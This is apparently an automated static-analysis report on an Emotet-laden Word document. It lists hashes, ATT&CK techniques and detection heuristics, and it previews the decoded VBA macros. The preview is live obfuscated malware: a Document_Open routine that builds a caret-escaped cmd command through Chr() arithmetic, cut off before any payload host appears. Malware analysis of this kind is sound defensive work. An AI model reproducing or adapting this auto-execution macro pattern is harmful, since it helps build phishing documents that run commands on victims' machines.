Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 341471236de1e1ed…

MALICIOUS

Office (OLE)

Size: 179.0 KB
Created: 2018-07-16 11:31:00
Authoring application: Microsoft Office Word
First seen: 2018-07-27
MD5: 364be39a9647d4d71cb28fc683071fbd
SHA-1: 56c8a91d73efd52bdc645494b659a5d20e1d2f2f
SHA-256: 341471236de1e1edb3a6547d995fef20084fdaa403ddf2cda9878f9e2ec697a7
Risk Score: 222

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 User Execution: Malicious File
  • T1566.001 Phishing: Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6958975-0', strongly suggesting the Emotet family. Static analysis revealed the presence of VBA macros, specifically a 'Document_Open' macro that utilizes the 'Shell()' function. This indicates the macro's intent is to execute an external command, typically for downloading and running a subsequent payload. The heuristic firings and the known behavior of Emotet align with this attack pattern.

Heuristics (6)

  • ClamAV: Doc.Downloader.Emotet-6958975-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6958975-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                               Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)  26799 bytes
SHA-256: ca2e38c3708922723f2df95425311fdd2de86cbd1a761eaa5dc4de523bb4f4c3
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "VDGXMwsfMYfDMh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function kkTXCklrRGO()
   sOdBrw = PKDSS + VOUqR + 64143 * MHRBG - 28117 / wJZTI
   oHnzI = jmjAmr + zHzCv + 53718 * dlwcv - 54846 / WFkkKi
   WGQlq = bShRA + hWQBz + 48932 * BtEFJ - 44165 / VStNJ
   GhqJGa = YRPOD + pLWYj + 70896 * DLLEjw - 25066 / wQbNTQ
End Function
Private Sub Document_open()
On Error Resume Next
   pqTWwR = ZMqLa + MdvLXF + 65682 * WqjEG - 61811 / HOkzD
   JwQHQ = zGTni + mvPWFR + 79219 * vbZtQj - 15095 / aRjUqn
   udcTzl = MhuqFw + MPjqk + 78341 * Kwdhj - 85689 / Haclq
   tSMPN = KtRhj + IKXiY + 72847 * wGzoi - 66711 / uCTov
NLloC = Application.Run("jtMBIauc", "" + zSAiVzhZU + OnkJShJMT + CVar("c") + RqlDSwGMWujO + WbMXpRPXnROWF + imFjvPhwCo + OzPnCQvXMiK + dzmjizBQ + jsdzpjhFZf + GFUzwsvzl + BTQSzlBvA + iUYLwQucvF + dbXsBjjvG + ddSHD + pZqYVN + jQuORiEz + jCmih + WWniVw + RJpzA + NmifqdF + vOZAZjYCwYkO + jwKEUjjwlTskF)
   QWDSO = aoiznS + XOMkRn + 59258 * LNdWsK - 53812 / HUImAf
   FPUri = VQkPl + tfJvdY + 39400 * iamJiA - 95313 / GIoiRl
End Sub
Function cvzzajN()
   wNULYV = zvFGYB + zEizYr + 72259 * KLFjwT - 56922 / EivQO
   THGPK = diTdwl + hsSjzN + 6123 * FpWHT - 73619 / bckUl
   jtctA = OfEJZw + XwNbc + 59227 * brHqjo - 83939 / jljQrr
   AHWXW = SkUaSK + OQRTbz + 1758 * iTjhC - 40126 / MahVJL
   rSbaq = cmFChB + MMMTBK + 97031 * SkIrJ - 57405 / qtbzj
End Function


Attribute VB_Name = "inRviPhZwqsabI"
Function imFjvPhwCo()
On Error Resume Next
uRzXPR = (WAKiqG + LZUBB * 14772 + GDYvdq)
LSUUJGI = CStr(Chr(YnhIhhtndsHNPR + VXAOiRfRaO + 109 + hlpOIwo + SMupkhTKfBt)) + "d " + "/" + CStr(Chr(ljvJSGIQhTjnF + sETdhtC + 99 + ZukLGvN + pzGTwihFLktOBi)) + " ^" + "Fo^R " + " " + "; , /F" + " ; " + CStr(Chr(SaiQawiZp + WwJmGYpQrw + 34 + ovbhSRq + uuoUfqXqR)) + "  t"
QfNVp = 65612 * MnXitR / hFEYIq + KXYBo - 27003 - 48574
   bnXitD = 56302 * ZdiHOi / rpKrq + RAIBG - 13915 - 79084
YEnFtRj = "o" + "ke" + "ns= 2" + "  de" + "li" + CStr(Chr(PFKJBwmqLOw + UtUwRQIzMJbBV + 109 + hRZaQvqjkSf + AMAwavAlWZZ)) + "s=" + "Jf=" + CStr(Chr(iCwjHjjLIt + DzdJjflvdz + 34 + fbZRpLsz + RnmBLwnTrSLYW)) + " " + ","
SkBwu = 41906 * wdcSzf / NvtzJ + DilMKn - 27648 - 55780
   oRXJPW = 26429 * iWCLNO / RUBoK + pLCQk - 97706 - 77832
   HJKho = 1567 * VsqiLV / wrUXFs + Nodiw - 12920 - 40812
tDnfatjhzdw = " ,  %^" + "E " + " ; ^" + "In ,  " + "," + " ( ;"
ZwXOt = 1203 * ZFqzIw / BUYGYP + itouUh - 97178 - 80199
   cMSIP = 96409 * Crpzz / TEqBh + iOUQwq - 4510 - 66448
aUYDUkjEzqL = "  '  " + "; " + " AS" + "S" + "o^^" + CStr(Chr(cmuoFufDoD + PVzBqwMf + 99 + hTmIKHhwGE + NYzKTzmkwzfrXz)) + " ," + " " + ", ." + CStr(Chr(VaKShFEbC + XVrzcfVIYEfi + 99 + EYjoukNMQbjtI + UWIXNOOG)) + CStr(Chr(MCpWMqv + cjUmHMWLFQ + 109 + WIzDhWHBipRj + hXpEklzjkbzj)) + "d" + "   '" + " "
hkLjX = 93515 * TlWAEh / dirVpi + RLLrHv - 41928 - 34738
FlHjaUYH = ";  " + ", " + " )" + " , ^" + "D^o ; " + ", " + "%^E;" + "  ,  6" + "y" + "gTQ" + "n/^v"
dYHNo = 36103 * HLhvHi / nqTIK + fumQY - 661 - 83604
PXbcJShPtfY = "^5^LV " + " ;  ; " + "6Je" + "2P/r  " + " " + CStr(Chr(qCJqkUpu + iTntumPlC + 34 + wVAffknXYEw + LbjbwQsniXaRzD)) + "  , " + " ;  ( " + "(" + "S^" + "et  ^ "
BYGwa = 17305 * PuYZh / wVEch + FCKCC - 46771 - 67662
   pnbfGB = 61902 * AljiX / Nmnzb + uTXKwv - 14299 - 83574
QKoDzTjRIcM = " [^;." + "=^" + "bnE:" + "y^o" + "L^" + ";^a" + "d" + "UxpI6^" + "Z}^" + "@fteWl" + "Bj-qG="
rXaaG = 95154 * aRSzEr / phwwQO + IwzVQR - 68570 - 21856
   AvNsGz = 56926 * otWJW / PjMGOJ + Fpzjad - 9123 - 81765
UVSpjKE = "$" + "^" + "K7" + CStr(Chr(MOhbfrhIKFjBWQ + zqiSGnmljrQ + 99 + OhjzZMqQuRU + QtjrQRIuTH)) + "^" + "s'A{Dk" + "^)" + "^" + CStr(Chr(rYbvunbiiw + CwEYODY + 109 + jXsFpbwpju + dinOVzdt)) + "1S" + "^v/"
XdwId = 9288 * kUqcVE / aCGkEd + ktvGQJ - 61077 - 38488
   IjGls = 93572 * CHXdo / dUskA + wGbhSm - 68721 - 5786
qXicivjr = "^" 
... (truncated)